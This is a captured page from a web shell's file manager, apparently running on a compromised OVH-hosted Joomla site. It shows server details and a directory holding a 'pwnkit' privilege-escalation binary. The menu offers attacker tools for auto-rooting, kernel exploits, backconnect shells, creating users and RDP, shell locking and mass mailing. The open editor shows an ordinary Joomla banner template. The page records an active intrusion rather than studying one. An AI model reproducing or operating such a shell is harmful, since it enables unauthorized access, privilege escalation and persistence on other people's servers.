Linux webm008.cluster106.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.106.20.8 | : 216.73.217.10
Cant Read [ /etc/named.conf ]
5.6.40
associattd
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
associattd /
www-old /
modules /
mod_banners /
tmpl /
[ HOME SHELL ]
Name
Size
Permission
Action
.mad-root
0
B
-rw-r--r--
default.php
4.11
KB
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : default.php
<?php /** * @package Joomla.Site * @subpackage mod_banners * * @copyright Copyright (C) 2005 - 2015 Open Source Matters, Inc. All rights reserved. * @license GNU General Public License version 2 or later; see LICENSE.txt */ defined('_JEXEC') or die; require_once JPATH_ROOT . '/components/com_banners/helpers/banner.php'; $baseurl = JUri::base(); ?> <div class="bannergroup<?php echo $moduleclass_sfx ?>"> <?php if ($headerText) : ?> <?php echo $headerText; ?> <?php endif; ?> <?php foreach ($list as $item) : ?> <div class="banneritem"> <?php $link = JRoute::_('index.php?option=com_banners&task=click&id=' . $item->id);?> <?php if ($item->type == 1) :?> <?php // Text based banners ?> <?php echo str_replace(array('{CLICKURL}', '{NAME}'), array($link, $item->name), $item->custombannercode);?> <?php else:?> <?php $imageurl = $item->params->get('imageurl');?> <?php $width = $item->params->get('width');?> <?php $height = $item->params->get('height');?> <?php if (BannerHelper::isImage($imageurl)) :?> <?php // Image based banner ?> <?php $alt = $item->params->get('alt');?> <?php $alt = $alt ? $alt : $item->name; ?> <?php $alt = $alt ? $alt : JText::_('MOD_BANNERS_BANNER'); ?> <?php if ($item->clickurl) :?> <?php // Wrap the banner in a link?> <?php $target = $params->get('target', 1);?> <?php if ($target == 1) :?> <?php // Open in a new window?> <a href="<?php echo $link; ?>" target="_blank" title="<?php echo htmlspecialchars($item->name, ENT_QUOTES, 'UTF-8');?>"> <img src="<?php echo $baseurl . $imageurl;?>" alt="<?php echo $alt;?>" <?php if (!empty($width)) echo 'width ="' . $width . '"';?> <?php if (!empty($height)) echo 'height ="' . $height . '"';?> /> </a> <?php elseif ($target == 2):?> <?php // Open in a popup window?> <a href="<?php echo $link;?>" onclick="window.open(this.href, '', 'toolbar=no,location=no,status=no,menubar=no,scrollbars=yes,resizable=yes,width=780,height=550'); return false" title="<?php echo htmlspecialchars($item->name, ENT_QUOTES, 'UTF-8');?>"> <img src="<?php echo $baseurl . $imageurl;?>" alt="<?php echo $alt;?>" <?php if (!empty($width)) echo 'width ="' . $width . '"';?> <?php if (!empty($height)) echo 'height ="' . $height . '"';?> /> </a> <?php else :?> <?php // Open in parent window?> <a href="<?php echo $link;?>" title="<?php echo htmlspecialchars($item->name, ENT_QUOTES, 'UTF-8');?>"> <img src="<?php echo $baseurl . $imageurl;?>" alt="<?php echo $alt;?>" <?php if (!empty($width)) echo 'width ="' . $width . '"';?> <?php if (!empty($height)) echo 'height ="' . $height . '"';?> /> </a> <?php endif;?> <?php else :?> <?php // Just display the image if no link specified?> <img src="<?php echo $baseurl . $imageurl;?>" alt="<?php echo $alt;?>" <?php if (!empty($width)) echo 'width ="' . $width . '"';?> <?php if (!empty($height)) echo 'height ="' . $height . '"';?> /> <?php endif;?> <?php elseif (BannerHelper::isFlash($imageurl)) :?> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0" <?php if (!empty($width)) echo 'width ="' . $width . '"';?> <?php if (!empty($height)) echo 'height ="' . $height . '"';?> > <param name="movie" value="<?php echo $imageurl;?>" /> <embed src="<?php echo $imageurl;?>" loop="false" pluginspage="http://www.macromedia.com/go/get/flashplayer" type="application/x-shockwave-flash" <?php if (!empty($width)) echo 'width ="' . $width . '"';?> <?php if (!empty($height)) echo 'height ="' . $height . '"';?> /> </object> <?php endif;?> <?php endif;?> <div class="clr"></div> </div> <?php endforeach; ?> <?php if ($footerText) : ?> <div class="bannerfooter"> <?php echo $footerText; ?> </div> <?php endif; ?> </div>
Close